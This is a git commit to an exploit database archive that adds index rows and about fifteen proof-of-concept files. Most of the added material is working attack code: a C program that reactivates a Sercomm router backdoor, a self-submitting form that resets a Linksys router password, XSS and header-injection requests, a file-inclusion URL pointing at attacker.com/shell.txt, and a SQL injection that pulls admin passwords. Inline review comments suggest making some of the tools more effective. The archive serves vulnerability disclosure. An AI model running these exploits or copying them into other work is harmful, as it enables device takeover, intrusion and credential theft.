Updated 04_20_2014

Offensive Security 2014-04-20 04:34:26 +00:00
parent 7abb0c1c05
commit 0181f4682f
17 changed files with 428 additions and 0 deletions


@ -29675,3 +29675,19 @@ id,file,description,date,author,platform,type,port
32924,platforms/php/webapps/32924.txt,"razorCMS 0.3RC2 Multiple Vulnerabilities",2009-04-16,"Jeremi Gosney",php,webapps,0
32925,platforms/multiple/remote/32925.txt,"NRPE <= 2.15 - Remote Command Execution",2014-04-18,"Dawid Golunski",multiple,remote,0
32926,platforms/linux/dos/32926.c,"Linux group_info refcounter - Overflow Memory Corruption",2014-04-18,"Thomas Pollet",linux,dos,0
32927,platforms/java/webapps/32927.txt,"BlackBerry Enterprise Server 4.0/4.1 MDS Connection Service Cross Site Scripting Vulnerability",2009-04-16,"Ken Millar",java,webapps,0
32928,platforms/php/webapps/32928.txt,"Malleo 1.2.3 'admin.php' Local File Include Vulnerability",2009-04-17,Drosophila,php,webapps,0
32929,platforms/linux/remote/32929.txt,"Red Hat Stronghold Web Server 2.3 Cross Site Scripting Vulnerability",2009-04-20,"Xia Shing Zee",linux,remote,0
32930,platforms/php/webapps/32930.txt,"CMSimple 4.4, 4.4.2 - Remote File Inclusion",2014-04-18,NoGe,php,webapps,80
32931,platforms/hardware/remote/32931.html,"Linksys WRT54GC 1.5.7 (Firmware) 'administration.cgi' Access Validation Vulnerability",2009-04-20,"Gabriel Lima",hardware,remote,0
32932,platforms/php/webapps/32932.txt,"Online Photo Pro 2.0 'section' Parameter Cross Site Scripting Vulnerability",2009-04-20,Vrs-hCk,php,webapps,0
32933,platforms/php/webapps/32933.txt,"Online Contact Manager 3.0 index.php showGroup Parameter XSS",2009-04-20,Vrs-hCk,php,webapps,0
32934,platforms/php/webapps/32934.txt,"Online Contact Manager 3.0 view.php id Parameter XSS",2009-04-20,Vrs-hCk,php,webapps,0
32935,platforms/php/webapps/32935.txt,"Online Contact Manager 3.0 email.php id Parameter XSS",2009-04-20,Vrs-hCk,php,webapps,0
32936,platforms/php/webapps/32936.txt,"Online Contact Manager 3.0 edit.php id Parameter XSS",2009-04-20,Vrs-hCk,php,webapps,0
32937,platforms/php/webapps/32937.txt,"Online Contact Manager 3.0 delete.php id Parameter XSS",2009-04-20,Vrs-hCk,php,webapps,0
32938,platforms/hardware/remote/32938.c,"Sercomm TCP/32674 Backdoor Reactivation",2014-04-18,Synacktiv,hardware,remote,32674
32939,platforms/windows/dos/32939.txt,"Trend Micro OfficeScan 8.0 Client - Denial of Service Vulnerability",2009-04-21,"Juan Pablo Lopez Yacubian",windows,dos,0
32940,platforms/java/webapps/32940.txt,"Sun Java System Delegated Administrator 6.x HTTP Response Splitting Vulnerability",2009-04-21,"SCS team",java,webapps,0
32941,platforms/php/webapps/32941.txt,"PTCeffect 4.6 - LFI & SQL Injection Vulnerabilities",2014-04-19,"walid naceri",php,webapps,0
32942,platforms/linux/remote/32942.txt,"Mozilla Multiple Products Server Refresh Header XSS",2009-04-22,"Olli Pettay",linux,remote,0
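Review bot: the new 32938 row records port 32674 and titles the entry "Sercomm TCP/32674 Backdoor Reactivation", while the PoC's own code comment and the Synacktiv paper it cites (TCP32764_backdoor_again.pdf) refer to TCP/32764; one of the two is a digit transposition and should be corrected so the CSV port field matches the service the exploit targets. Two smaller consistency points in the same hunk: the 32931 title says firmware "1.5.7" whereas the advisory body says 1.05.7, and 32930 is the only new webapps row given port 80 where every other new webapps row uses 0.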


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34616/info
The Linksys WRT54GC router is prone to an access-validation vulnerability because of a lack of authentication when users access specific administration applications.
Successful attacks will lead to a compromise of the vulnerable device, which may lead to further attacks.
Linksys WRT54GC running firmware 1.05.7 is vulnerable; other versions may also be affected.
<html><body> <form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data"> <INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21> <INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21> </form> <!-- C?digo de envio autom?tico do formul?rio --> <SCRIPT language="JavaScript"> document.senha.submit(); </SCRIPT>
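Review bot: the firmware version in the advisory body (1.05.7) disagrees with the CSV title for this entry (1.5.7); pick one. The inline HTML comment is mis-encoded ("C?digo de envio autom?tico do formul?rio" is Portuguese for "automatic form submission code") and would be clearer rewritten in English. The text calls this an "access-validation" issue, but what the PoC actually does is post `sysPasswd` and `sysConfirmPasswd` to `administration.cgi` on port 8080 from a cross-site page with no prior login, i.e. an unauthenticated password reset of the router; stating that impact explicitly would help readers triage it. The `<html><body>` tags are also never closed.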

platforms/hardware/remote/32938.c Executable file

@ -0,0 +1,164 @@
/***************************************
* PoC to reactivate Sercomm TCP/32674 backdoor
* See http://www.synacktiv.com/ressources/TCP32764_backdoor_again.pdf
* Eloi Vanderbeken - Synacktiv
*
* THIS SOFTWARE IS PROVIDED BY SYNACKTIV ''AS IS'' AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL SYNACKTIV BE LIABLE FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* PoC based on Wilmer van der Gaast's code
* http://wiki.openwrt.org/_media/toh/netgear/dg834.g.v4/nftp.c
***************************************/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>
#include <linux/if_arp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#define ETH_P_NFTP 0x8888
enum backdoor_command {
PING_BACKDOOR = 0x200,
SCFGMGR_LAUNCH,
SET_IP
};
struct ether_header
{
unsigned char ether_dhost[ETH_ALEN];
unsigned char ether_shost[ETH_ALEN];
unsigned short ether_type;
} eth;
struct raw_packet {
struct ether_header header;
uint16_t type;
uint16_t sequence;
uint16_t offset;
uint16_t chunk;
uint16_t payload_len;
uint8_t payload[528];
};
int main(int argc, char *argv[])
{
int sockfd, res, i, len;
char src_mac[ETH_ALEN];
struct ifreq iface;
struct sockaddr_ll socket_address;
struct raw_packet packet;
memset(&packet, 0, sizeof(packet));
if (argc < 2)
{
fprintf(stderr, "usage : %s [IFNAME]\n", argv[0]);
exit(1);
}
sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (sockfd == -1)
{
if(geteuid() != 0)
{
fprintf(stderr, "You should probably run this program as root.\n");
}
perror("socket");
exit(1);
}
seteuid(getuid());
strncpy(iface.ifr_name, argv[1], IFNAMSIZ);
res = ioctl(sockfd, SIOCGIFHWADDR, &iface);
if(res < 0)
{
perror("ioctl");
exit(1);
}
memcpy(src_mac, iface.ifr_hwaddr.sa_data, ETH_ALEN);
res = ioctl(sockfd, SIOCGIFINDEX, &iface);
if(res < 0)
{
perror("ioctl");
exit(1);
}
// set src mac
memcpy(packet.header.ether_shost, src_mac, ETH_ALEN);
// broadcast
memset(packet.header.ether_dhost, 0xFF, ETH_ALEN);
// MD5("DGN1000")
memcpy(packet.payload, "\x45\xD1\xBB\x33\x9B\x07\xA6\x61\x8B\x21\x14\xDB\xC0\xD7\x78\x3E", 0x10);
packet.payload_len = htole16(0x10);
// ethernet packet type = 0x8888
packet.header.ether_type = htons(ETH_P_NFTP);
// launch TCP/32764 backdoor
packet.type = htole16(SCFGMGR_LAUNCH);
socket_address.sll_family = PF_PACKET;
socket_address.sll_protocol = htons(ETH_P_NFTP);
socket_address.sll_ifindex = iface.ifr_ifindex;
socket_address.sll_hatype = ARPHRD_ETHER;
socket_address.sll_pkttype = PACKET_OTHERHOST;
// broadcast
socket_address.sll_halen = ETH_ALEN;
memset(socket_address.sll_addr, 0xFF, ETH_ALEN);
res = sendto(sockfd, &packet, 0x10 + 24, 0, (struct sockaddr *)&socket_address, sizeof(socket_address));
if (res == -1)
{
perror("sendto");
exit(1);
}
do {
memset(&packet, 0, sizeof(packet));
res = recvfrom(sockfd, &packet, sizeof(packet), 0, NULL, NULL);
if (res == -1)
{
perror("recvfrom");
exit(1);
}
} while (ntohs(packet.header.ether_type) != ETH_P_NFTP);
if (res < sizeof(packet) - sizeof(packet.payload))
{
fprintf(stderr, "packet is too short: %d bytes\n", res);
exit(1);
}
len = be16toh(packet.payload_len); // SerComm has a real problem with endianness
printf("received packet: %d bytes (payload len = %d) from ", res, len);
for (i = 0; i < ETH_ALEN; i++)
printf("%02X%c", packet.header.ether_shost[i], i == ETH_ALEN-1 ? '\n' : ':');
for (i = 0; (i < len) && (i < sizeof(packet.payload)); i++)
{
printf("%02X ", packet.payload[i]);
if ((i+1) % 16 == 0)
printf("\n");
}
printf("\n");
return 0;
}
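Review bot: `strncpy(iface.ifr_name, argv[1], IFNAMSIZ)` does not NUL-terminate when the interface name is IFNAMSIZ bytes or longer, and `iface` is never zeroed; copy at most IFNAMSIZ-1 bytes and terminate explicitly (or `memset(&iface, 0, sizeof(iface))` first). The send length `0x10 + 24` hard-codes the 14-byte Ethernet header plus the 10 bytes of type/sequence/offset/chunk/payload_len; `sizeof(packet) - sizeof(packet.payload) + 0x10` says the same thing without the magic number. The receive loop has no timeout and filters only on EtherType, so if no Sercomm device is on the segment the program blocks forever; a `SO_RCVTIMEO` on the socket (or `poll()`) plus a check that `packet.type` is the expected reply would make the tool usable for scanning a network. `htole16` and `be16toh` come from `<endian.h>`, which is reached here only indirectly through `<sys/types.h>`; include it explicitly. The banner comment says TCP/32674 while the later comment and the PDF link say TCP/32764; fix the typo. The global `eth` is unused.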


@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/34573/info
BlackBerry Enterprise Server MDS Connection Service is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
Versions prior to BlackBerry Enterprise Server 4.1.6 MR5 are vulnerable.
POST /admin/statistics/ConfigureStatistics HTTP/1.0
Cookie: JSESSIONID=....
Content-Length: 753
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: ...
Content-Type: application/x-www-form-urlencoded
Referer: http://www.example.com:8080/admin/statistics/ConfigureStatistics
customDate=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
interval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
lastCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E
&lastIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%
3E&nextCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript
%3E&nextIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%
2Fscript%3E&action=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E
&delIntervalIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
addStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
delStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
referenceTime=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E
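Review bot: the POST body (from `customDate=` through `referenceTime=`) has been wrapped across several lines, so as stored it no longer matches `Content-Length: 753` and will not replay as-is; keep the form body on one line (some breaks even fall inside a percent-escape, e.g. `%2Fscript%` followed by `3E`). The payload `>"'><script>alert(782)</script>` is sent in all eleven parameters at once, so the file never says which fields are actually reflected; naming them would turn this into a reproducible test rather than a shotgun request.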


@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/34643/info
Sun Java System Delegated Administrator is prone to an HTTP response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data.
Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
The following example HTTP session is available:
$ openssl s_client -connect <server>:443
GET
/da/DA/Login?Login.HelpHREF=http://www.example.com/&com_sun_web_ui_popup=false&HELP_PAGE=/help/%0AX-Tag:%20Core%20Security%20Technologies%0A%0D&jato.pageSession=
HTTP/1.1
Host: <server>
HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 20 Apr 2009 18:21:48 GMT
Cache-control: private
Location: <server>
X-Tag: Core Security Technologies
Content-length: 0
Content-type: text/htm
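Review bot: the request line is split over three lines (`GET`, the path, `HTTP/1.1`); it must be a single line for the `openssl s_client` session to send a valid request. The injected `HELP_PAGE` value ends in `%0A%0D` (LF then CR), the reverse of the CRLF that normally terminates a header; the server evidently accepted it, as the reflected `X-Tag: Core Security Technologies` header in the response shows, but the advisory should say whether that ordering is deliberate or whether `%0D%0A` works too. `Content-type: text/htm` in the captured response looks truncated.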


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34606/info
Red Hat Stronghold Web Server is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
Stronghold 2.3 is vulnerable; other versions may also be affected.
http://www.example.com/<script>alert("lol");</script> http://www.example.com/<script>window.location="http://www.google.com"</script> http://www.example.com/<body bgcolor="black"><font color="green">
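Review bot: the three PoC URLs are run together on one line; put one per line. The payload sits in the URL path rather than in a query parameter, so the advisory should state which response reflects the path (an error document, a directory listing, a module page?), since nothing in the text identifies the vulnerable handler and that detail decides whether the fix belongs in Stronghold or in the site's error pages.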


@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/34656/info
The Mozilla Foundation has released multiple security advisories specifying various vulnerabilities in Firefox, Thunderbird, and SeaMonkey.
Attackers can exploit these issues to bypass same-origin restrictions, obtain potentially sensitive information, and execute arbitrary script code with elevated privileges; other attacks are also possible.
With request to script at web site:
http://www.example.com/script.php?param=javascript:alert(document.cookie)
Which returns in answer the refresh header:
refresh: 0; URL=javascript:alert(document.cookie)
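Review bot: the description is the generic text for the whole Mozilla advisory bundle (same-origin bypass, information disclosure, privileged script execution), but this entry is specifically the `Refresh` header with a `javascript:` URL being executed by the browser, and the text should say so. The PoC also depends on a server-side page that echoes `param` into a `Refresh` header; the file should either include that handler (one line of PHP such as `header("Refresh: 0; URL=" . $_GET["param"]);` would do) or state that any site reflecting input into `Refresh` serves as the trigger. "With request to script at web site" and "Which returns in answer the refresh header" read awkwardly; "A request to a page that reflects the parameter" / "returns this header" would be cleaner.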


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34588/info
Malleo is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view and execute arbitrary local files in the context of the webserver process. This may aid in further attacks.
Malleo 1.2.3 is vulnerable; other versions may also be affected.
http://www.example.com/path/admin.php?module=../../../../../etc/passwd
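Review bot: the text claims the attacker can "view and execute arbitrary local files", but the PoC only demonstrates reading /etc/passwd via `module=../../../../../etc/passwd`; execution would need a local file containing attacker-controlled PHP (an upload, a poisoned log), which the file neither shows nor mentions. Also say whether admin.php appends a suffix to `module`, since the PoC as written only works if it does not (or a null byte is needed), and note that the vulnerable parameter name `module` appears only in the URL and never in the description.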

platforms/php/webapps/32930.txt Executable file

@ -0,0 +1,56 @@
=============================================================================================================
[o] CMSimple - Open Source CMS with no database <= Remote File Inclusion Vulnerability
Software : CMSimple - Open Source CMS with no database
Version : 4.4, 4.4.2 and below
Vendor : http://www.cmsimple.org
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com
Desc : CMSimple is a php based Content Managemant System (CMS), which requires no database.
All data are stored in a simple file system.
=============================================================================================================
[o] Vulnerable File
plugins/filebrowser/classes/required_classes.php
require_once $pth['folder']['plugin'] . 'classes/filebrowser_view.php';
require_once $pth['folder']['plugin'] . 'classes/filebrowser.php';
=============================================================================================================
[o] Exploit
http://localhost/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=[RFI]
=============================================================================================================
[o] PoC
http://target.com/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?
=============================================================================================================
[o] Greetz
Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{
=============================================================================================================
[o] April 17 2014 - Papua, Indonesia - Met Paskah! Tuhan berkati.. :)
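Review bot: the RFI only works under two PHP settings the advisory never mentions: `$pth['folder']['plugin']` is populated from the query string only when `register_globals` is on (removed in PHP 5.4), and `require_once` of an `http://` URL needs `allow_url_include=On`. State both, because on a default 2014 PHP install a direct request to `required_classes.php` with that query string does nothing useful. The version line "4.4, 4.4.2 and below" is ambiguous about whether 4.4.1 is affected and whether 4.4.2 is the highest affected release, and "Content Managemant" in the Desc line is a typo.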


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34625/info
Online Photo Pro is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
Online Photo Pro 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?section=<script>alert(123)</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34626/info
Online Contact Manager is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Online Contact Manager 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?showGroup=+<script>alert(123)</script>
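Review bot: this and the following four Online Contact Manager entries (view.php, email.php, edit.php, delete.php) carry identical description text and differ only in the URL; one file listing all five endpoints, or a sentence in each naming the reflecting context (attribute value vs. page body), would be more useful than five copies. The leading `+` in `showGroup=+<script>` decodes to a space and is harmless, but its purpose is not explained.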


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34626/info
Online Contact Manager is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Online Contact Manager 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/view.php?id=+<script>alert(123)</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34626/info
Online Contact Manager is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Online Contact Manager 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/email.php?id=+<script>alert(123)</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34626/info
Online Contact Manager is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Online Contact Manager 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/edit.php?id=+<script>alert(123)</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34626/info
Online Contact Manager is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Online Contact Manager 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/delete.php?id=+<script>alert(123)</script>

platforms/php/webapps/32941.txt Executable file

@ -0,0 +1,37 @@
# Exploit Title: PTCeffect LFI & SQL Injection Vulnerabilities
# Google Dork: find it :)
# Date: 2014-04-19
# Exploit Author: Walidz
# Software Link: http://www.ptceffect.com/
# Version: 4.6
# Tested on: windows,linux,mac os
# CVE : N/A
The LFI vulnerability is in index.php
--------------------[index.php]--------------------
if ($input->g['view']) {
$filename = strtolower($input->g['view']) . ".php";
[...]
include SOURCES . $filename;
--------------------[index.php]--------------------
So you can include a fil by doing ; http://[site]/index.php?view=[file]
By using the LFI, you can also include "admin files" which are especially unsecure, and let you inject SQL queries.
As the file admin/sources/edit_loginad.php
PoC ; http://[site]/index.php?view=../admin/Sources/edit_loginad&edit=-1%20union%20select%201,2,3,4,%28SELECT%20password%20FROM%20admin%29,6,7,8,9--%20-
For more tools and priv8 exploit: http://security-dz.com
For contact: admin@security-dz.com
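Review bot: the include path is passed through `strtolower()` and has `.php` appended, so `view=../admin/Sources/edit_loginad` is actually included as `../admin/sources/edit_loginad.php`; that matches the lowercase `admin/sources/` path given a few lines earlier and should be stated, because the capital S in the PoC would make anyone on a case-sensitive filesystem think the PoC is wrong. The forced `.php` suffix also means this LFI can only include PHP source under the traversal-reachable tree, not /etc/passwd or log files, which the text should say instead of "include a file". The UNION payload assumes nine columns and a table `admin` with a `password` column, and the `-1 union` form implies `edit` is used unquoted; name the query in edit_loginad.php it targets. Minor: "fil" should be "file", and "Google Dork: find it :)" and "Tested on: windows,linux,mac os" add nothing.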


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34642/info
The Trend Micro OfficeScan Client is prone to a denial-of-service vulnerability because it fails to handle nested directories with excessively long names.
Successfully exploits will crash the affected application, resulting in a denial-of-service condition. Given the nature of this issue, code execution may be possible, but has not been confirmed.
OfficeScan 8.0 SP1 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/32939.zip
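Review bot: the entry is only a link to an externally hosted zip, so the repository has no record of what the PoC contains; the text should describe the trigger (per the description, a nested directory tree with excessively long names that the client scans) and ideally carry the generator script itself so the entry survives the link. "Successfully exploits will crash" should read "Successful exploits will crash".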